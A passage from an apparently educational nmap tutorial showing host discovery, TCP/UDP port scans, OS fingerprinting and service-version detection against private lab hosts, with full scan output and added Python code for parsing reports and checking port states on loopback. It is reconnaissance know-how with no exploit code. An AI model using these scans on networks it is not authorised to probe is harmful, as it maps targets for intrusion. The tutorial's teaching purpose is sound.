139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
ICMP netmask scan: -PM
#nmap -PM 192.168.0.106
Scanning devices with TCP
TCP SYN scan of devices: -PS
#nmap -PS 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:02 CST
Nmap scan report for 192.168.0.106
Host is up (0.0022s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
TCP ACK scan of devices: -PA
# nmap -PA 192.168.0.106 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:05 CST
Nmap scan report for 192.168.0.106
Host is up (0.00017s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.42 seconds
UDP scan of devices: -PU

UDP scanning is simpler, but less convenient than TCP and slower.

#nmap -PU 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 18:36 CST
Nmap scan report for 192.168.0.106
Host is up (0.00076s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds
Port scanning
Port categories

- Well-known ports: 0-1024

- Registered ports: 1025-49,151

- Dynamic/private ports: 49,152-65,535

Port states

- Open: the port is open. nmap sends two SYN requests; the process listening on that port on the server answers with SYN/ACK. On receiving the server's reply nmap sends two RSTs, so no connection is established, and the port probe is complete.

- Closed: the port is closed. nmap sends two SYN requests; since no process is listening on the port, the kernel returns RST. nmap receives the server's RST and records the result as closed.

- Filtered: the server drops nmap's SYN packets without replying. Since nmap sent two SYNs and got no answer to either, it concludes that a firewall on the server is dropping the SYN packets.

- Unfiltered: nmap's default is a SYN scan; with the -sA option (TCP ACK scan) it sends two identical ACK packets in a row. Because nmap is acknowledging a packet the server never sent, the server replies with an RST; when nmap receives that RST it knows the server did not drop the probe. Note that this probe cannot tell whether the port is open or closed, only that the server received the packet and answered it with an RST.

- open|filtered: open or filtered. nmap cannot distinguish whether the port is open or filtered. This state is commonly seen on UDP ports; see the UDP explanation that follows.

- closed|filtered: closed or filtered.
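Every nmap report on this page is built from the states listed above. As an added example (not from the original post), a Python parser for that report format that maps each host to its port records and compares the open ports with an expected-exposure baseline; the sample report is constructed from the same lab hosts and the baseline is an assumption. It also covers a host with no listed ports and the ambiguous open|filtered state that a UDP scan produces.

```python
import re
from typing import Dict, List, NamedTuple, Set, Tuple

# Port states as listed above.
PORT_STATES = {"open", "closed", "filtered", "unfiltered",
               "open|filtered", "closed|filtered"}

class PortRecord(NamedTuple):
    port: int
    proto: str
    state: str
    service: str

# Constructed sample in the format of the nmap reports on this page: one host
# with TCP results, one host with nothing listed, one host from a UDP scan.
SAMPLE_SCAN = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:27 CST
Nmap scan report for 192.168.0.160
Host is up (0.0017s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
23/tcp   open  telnet
80/tcp   open  http
1524/tcp open  ingreslock
MAC Address: 00:0C:29:FA:DD:2A (VMware)

Nmap scan report for 192.168.0.159
Host is up (0.012s latency).
All 1000 scanned ports on 192.168.0.159 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Nmap scan report for 192.168.0.106
Host is up (0.00064s latency).
Not shown: 998 closed udp ports (port-unreach)
PORT     STATE         SERVICE
137/udp  open          netbios-ns
138/udp  open|filtered netbios-dgm
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 3 IP addresses (3 hosts up) scanned in 2.10 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_nmap(text: str) -> Dict[str, List[PortRecord]]:
    """Turn nmap's normal text report into {host: [PortRecord, ...]}."""
    hosts: Dict[str, List[PortRecord]] = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []        # a host with nothing listed still shows up
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            if state not in PORT_STATES:
                raise ValueError(f"unknown port state {state!r}: {line}")
            hosts[current].append(PortRecord(int(port), proto, state, service))
    return hosts

Finding = Tuple[str, str, str]   # (host, "port/proto", service or state)

def review_exposure(hosts: Dict[str, List[PortRecord]],
                    baseline: Dict[str, Set[str]]) -> Tuple[List[Finding], List[Finding]]:
    """Compare a scan with the ports each host is supposed to expose.

    Returns (unexpected, ambiguous): 'unexpected' are open ports missing from
    the host's baseline; 'ambiguous' are open|filtered / closed|filtered
    results, which a SYN or UDP scan alone cannot settle.
    """
    unexpected: List[Finding] = []
    ambiguous: List[Finding] = []
    for host, records in hosts.items():
        allowed = baseline.get(host, set())
        for r in records:
            key = f"{r.port}/{r.proto}"
            if r.state == "open" and key not in allowed:
                unexpected.append((host, key, r.service))
            elif "|" in r.state:
                ambiguous.append((host, key, r.state))
    return unexpected, ambiguous
```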

Scanning techniques
No port scan: -sn
# nmap -sn 192.168.0.106 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:26 CST
Nmap scan report for 192.168.0.106
Host is up (0.0011s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
# nmap -sn -PE 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:27 CST
Nmap scan report for 192.168.0.106
Host is up (0.00055s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds
# nmap -sn 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:30 CST
Nmap scan report for 192.168.0.1
Host is up (0.0043s latency).
MAC Address: F4:83:CD:A6:DE:E3 (Tp-link Technologies)
Nmap scan report for 192.168.0.106
Host is up (0.00036s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap scan report for 192.168.0.151
Host is up (0.12s latency).
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.158
Host is up (0.12s latency).
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.159
Host is up (0.086s latency).
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.161
Host is up (0.00032s latency).
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap scan report for 192.168.0.150
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 2.40 seconds
SYN half-open scan: -sS

NMAP machine → SYN → target machine

target machine → SYN+ACK → NMAP machine

NMAP machine → RST → target machine (connection torn down)

Returns Open, Closed, or filtered

#nmap -sS 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:33 CST
Nmap scan report for 192.168.0.106
Host is up (0.0011s latency).
Not shown: 978 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds
Connect scan: -sT

Completes the three-way handshake

NMAP machine → SYN → target machine

target machine → SYN+ACK → NMAP machine

NMAP machine → ACK → target machine (connection established)

#nmap -sT 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:44 CST
Nmap scan report for 192.168.0.106
Host is up (0.0013s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
UDP scan: -sU

Reports Open or Open|filtered and is very slow. A probe that gets an application reply is Open, an ICMP port-unreachable reply means Closed, and no reply at all is Open|filtered: the port may be open (the service ignores an empty probe) or a firewall may have dropped the probe. The slowness comes from hosts rate-limiting ICMP unreachable messages (Linux sends about one per second), which is why 1000 ports took 1080 seconds below.

#nmap -sU 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:47 CST
Stats: 0:17:39 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 99.44% done; ETC: 13:05 (0:00:06 remaining)
Nmap scan report for 192.168.0.106
Host is up (0.00064s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT     STATE         SERVICE
137/udp  open          netbios-ns
138/udp  open|filtered netbios-dgm
500/udp  open|filtered isakmp
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
5050/udp open|filtered mmcc
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1080.72 seconds
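The three decision rules above (SYN/ACK, RST or silence for TCP; reply, ICMP unreachable or silence for UDP) in runnable form, as an added example that is not part of the original article and not Nmap code. It uses the operating system's connect() like -sT rather than raw SYNs, so it needs no root, and it starts its own loopback listeners as constructed targets; the timeout, the helper names and the fixtures are choices made for this illustration.

```python
"""Connect-style TCP and UDP port state decisions, as used by nmap -sT and -sU.
Added example; not part of the original article and not Nmap code.
Runs unprivileged: it relies on the OS connect() rather than raw SYN packets."""
import socket
import threading

TIMEOUT = 1.0  # seconds; Nmap adapts this per host from observed round-trip times


def tcp_connect_state(host: str, port: int, timeout: float = TIMEOUT) -> str:
    """-sT rule: complete the handshake with connect().
    SYN/ACK -> open; RST -> closed (ECONNREFUSED); silence -> filtered."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"        # full handshake: the service sees (and may log) a connection
        except ConnectionRefusedError:
            return "closed"      # target answered the SYN with RST
        except (socket.timeout, OSError):
            return "filtered"    # nothing came back: dropped by a firewall or host unreachable


def udp_state(host: str, port: int, payload: bytes = b"\x00", timeout: float = TIMEOUT) -> str:
    """-sU rule: send one datagram and look at what comes back.
    Application reply -> open; ICMP port unreachable -> closed (on a connected UDP
    socket the kernel surfaces it as ECONNREFUSED, or ECONNRESET on Windows);
    no reply at all -> open|filtered."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))  # connected socket, so ICMP errors are delivered to us
        try:
            s.send(payload)
            s.recv(65535)
            return "open"
        except (ConnectionRefusedError, ConnectionResetError):
            return "closed"
        except socket.timeout:
            return "open|filtered"


def scan(host: str, tcp_ports=(), udp_ports=()) -> dict:
    """Return {'tcp': {port: state}, 'udp': {port: state}} for the given port lists."""
    return {
        "tcp": {p: tcp_connect_state(host, p) for p in tcp_ports},
        "udp": {p: udp_state(host, p) for p in udp_ports},
    }


def start_tcp_listener() -> int:
    """Constructed fixture: a TCP service on an ephemeral loopback port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:
                return

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def start_udp_echo() -> int:
    """Constructed fixture: a UDP service that answers every datagram it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))

    def serve():
        while True:
            try:
                data, peer = srv.recvfrom(65535)
                srv.sendto(b"echo:" + data, peer)
            except OSError:
                return

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def free_port(kind: str = "tcp") -> int:
    """Constructed fixture: bind-and-release to find a loopback port that is currently closed."""
    sock_type = socket.SOCK_STREAM if kind == "tcp" else socket.SOCK_DGRAM
    with socket.socket(socket.AF_INET, sock_type) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    tcp_open, udp_open = start_tcp_listener(), start_udp_echo()
    print(scan("127.0.0.1", (tcp_open, free_port("tcp")), (udp_open, free_port("udp"))))
```

The UDP "closed" verdict depends on the ICMP unreachable reaching the scanner; on a host that rate-limits or a firewall that drops ICMP the same port comes back as open|filtered, which is exactly the ambiguity Nmap reports.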
Scan every named port: -p "*"

The * wildcard matches port names in nmap-services, so -p "*" scans every port that has a name there (8351 TCP ports in this run: 8319 closed plus 32 open), not all 65535. Use -p- (or -p 1-65535) for a full sweep.

#nmap -p "*" 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:49 CST
Nmap scan report for 192.168.0.106
Host is up (0.0039s latency).
Not shown: 8319 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
79/tcp   open  finger
80/tcp   open  http
105/tcp  open  csnet-ns
106/tcp  open  pop3pw
110/tcp  open  pop3
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
445/tcp  open  microsoft-ds
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1433/tcp open  ms-sql-s
1536/tcp open  ampr-inter
1537/tcp open  sdsc-lm
1538/tcp open  3ds-lm
1539/tcp open  intellistor-lm
1540/tcp open  rds
1552/tcp open  pciarray
1639/tcp open  cert-initiator
2224/tcp open  efi-mg
2383/tcp open  ms-olap4
2869/tcp open  icslap
3306/tcp open  mysql
5040/tcp open  unknown
5555/tcp open  freeciv
8000/tcp open  http-alt
8009/tcp open  ajp13
8080/tcp open  http-proxy
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 3.69 seconds
Scan the n most commonly open ports: --top-ports n
#nmap --top-ports 10 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:54 CST
Nmap scan report for 192.168.0.106
Host is up (0.00039s latency).
PORT     STATE  SERVICE
21/tcp   open   ftp
22/tcp   closed ssh
23/tcp   closed telnet
25/tcp   open   smtp
80/tcp   open   http
110/tcp  open   pop3
139/tcp  open   netbios-ssn
443/tcp  open   https
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

Scan a specific port: -p port

# nmap -p 8100 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:02 CST
Nmap scan report for 192.168.0.106
Host is up (0.00056s latency).
PORT     STATE SERVICE
8100/tcp open  xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
Operating system detection

Nmap OS detection is active: it sends up to 16 crafted TCP, UDP and ICMP probes to open and closed ports and compares the replies with its fingerprint database. The result is a best match, not a certainty, and it is most reliable when the target has at least one open and one closed TCP port.

Basic OS scan: -O
# nmap -O 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:05 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 13:05 (0:00:00 remaining)
Nmap scan report for 192.168.0.161
Host is up (0.0017s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.01 seconds
Only fingerprint hosts that have at least one open and one closed port: -O --osscan-limit
nmap -O --osscan-limit 192.168.0.158
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 14:37 CST
Nmap scan report for 192.168.0.158
Host is up (0.0068s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.98 seconds
Guess more aggressively when there is no exact match: -O --osscan-guess

Like every -O scan this needs root for raw packets. 192.168.0.159 had all 1000 scanned ports closed, so even with --osscan-guess Nmap can only report that too many fingerprints match.

# nmap -O --osscan-guess 192.168.0.159
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 14:42 CST
Nmap scan report for 192.168.0.159
Host is up (0.0092s latency).
All 1000 scanned ports on 192.168.0.159 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds
Scanning for services
Scanning technique

Port scan: SYN scan by default (connect scan when not running as root).

Service identification: send the probes from nmap-service-probes and match the reply against known signatures to confirm the service.

Version identification: parse the reply (banner, headers, protocol fields) to extract product and version.

Service scan: -sV
# nmap -sV 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-15 10:19 CST
Nmap scan report for 192.168.0.106
Host is up (0.00034s latency).
Not shown: 985 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
80/tcp   open  http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp  open  msrpc           Microsoft Windows RPC
139/tcp  open  netbios-ssn     Microsoft Windows netbios-ssn
443/tcp  open  ssl/http        Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
445/tcp  open  microsoft-ds?
902/tcp  open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp  open  vmware-auth     VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1433/tcp open  ms-sql-s        Microsoft SQL Server 2014 12.00.2269
2383/tcp open  ms-olap4?
3000/tcp open  ppp?
3306/tcp open  mysql           MariaDB (unauthorized)
5555/tcp open  freeciv?
8009/tcp open  ajp13           Apache Jserv (Protocol v1.3)
8080/tcp open  http            Apache Tomcat/Coyote JSP engine 1.1
8100/tcp open  http            Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
=====NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)=======
SF-Port3000-TCP:V=7.92%I=7%D=6/15%Time=62A941D5%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Wed,\x2015\x20Jun\x202022\x2002:20
SF::09\x20GMT\r\nContent-Length:\x2029\r\n\r\n
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20We
SF:d,\x2015\x20Jun\x202022\x2002:20:14\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Req
SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
SF:0close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1
SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset
SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSess
SF:ionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found\
SF:r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset
SF:=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\
SF:r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt
SF:%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;
SF:\x20mode=block\r\nDate:\x20Wed,\x2015\x20Jun\x202022\x2002:20:40\x20GMT
SF:\r\nContent-Length:\x2029\r\n\r\n
SF:);
===NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)=======
SF-Port5555-TCP:V=7.92%I=7%D=6/15%Time=62A941D5%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,138,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20no-cache\r\
SF:nPragma:\x20no-cache\r\nExpires:\x200\r\ncharset:\x20UTF8\r\nX-Frame-Op
SF:tions:\x20DENY\r\nX-XSS-Protection:\x201;\x20mode=block\r\nX-Content-Ty
SF:pe-Options:\x20nosniff\r\nContent-Type:\x20text/html\r\n\r\n{\"STATUS\"
SF::\x20\"REDIRECT\",\x20\"RESPONSE\":\x20\"mlogin\.html\",\x20\"ExtendedR
SF:esponse\":\x20\[{\"last_notification_change_ts\"\x20:\x20\"\"}\]}")%r(G
SF:etRequest,2D,"HTTP/1\.0\x20302\x20Found\r\nLocation:\x20mlogin\.html\r\
SF:n\r\n")%r(HTTPOptions,2D,"HTTP/1\.0\x20302\x20Found\r\nLocation:\x20mlo
SF:gin\.html\r\n\r\n")%r(RTSPRequest,2D,"HTTP/1\.0\x20302\x20Found\r\nLoca
SF:tion:\x20mlogin\.html\r\n\r\n")%r(FourOhFourRequest,6E,"HTTP/1\.1\x2040
SF:4\x20Not\x20Found\r\nCache-Control:\x20max-age=3600,\x20must-revalidate
SF:\r\nExpires:\x20Thu,\x2015\x20Jun\x202023\x2002:21:07\x20GMT\r\n")%r(SI
SF:POptions,138,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20no-cache\r\nP
SF:ragma:\x20no-cache\r\nExpires:\x200\r\ncharset:\x20UTF8\r\nX-Frame-Opti
SF:ons:\x20DENY\r\nX-XSS-Protection:\x201;\x20mode=block\r\nX-Content-Type
SF:-Options:\x20nosniff\r\nContent-Type:\x20text/html\r\n\r\n{\"STATUS\":\
SF:x20\"REDIRECT\",\x20\"RESPONSE\":\x20\"mlogin\.html\",\x20\"ExtendedRes
SF:ponse\":\x20\[{\"last_notification_change_ts\"\x20:\x20\"\"}\]}");
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.23 seconds
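How the "send a probe, match the reply" step works, as an added example (not the article's, Nmap's or Metasploit's code): a banner grab followed by a hand-written signature table in the style of nmap-service-probes match lines. The regexes, the PROBES table and the loopback fixture are assumptions made for this illustration; the banners used to exercise it are the ones seen in this chapter (vsFTPd 2.3.4, OpenSSH 9.0p1, FileZilla 0.9.41). The Metasploit ssh_version and ftp_version modules used later do essentially the same NULL-probe banner read.

```python
"""Banner-driven service and version identification in the spirit of nmap -sV
and of Metasploit's ssh_version / ftp_version modules. Added example, not code
from the article, from Nmap or from Metasploit; the signature table is a
hand-written sketch of what nmap-service-probes match lines look like."""
import re
import socket
import threading
from typing import Optional

# Each signature: (service name, regex, product, version template).
# Templates use $1/$2 backreferences just as nmap-service-probes "match" lines do.
SIGNATURES = [
    ("ssh",  re.compile(rb"^SSH-2\.0-OpenSSH_([\w.]+)(?: (\S+))?"),          "OpenSSH",        "$1"),
    ("ftp",  re.compile(rb"^220 \(vsFTPd ([\d.]+)\)"),                        "vsftpd",         "$1"),
    ("ftp",  re.compile(rb"^220-FileZilla Server version ([\w. ]+?)\r?\n"),   "FileZilla ftpd", "$1"),
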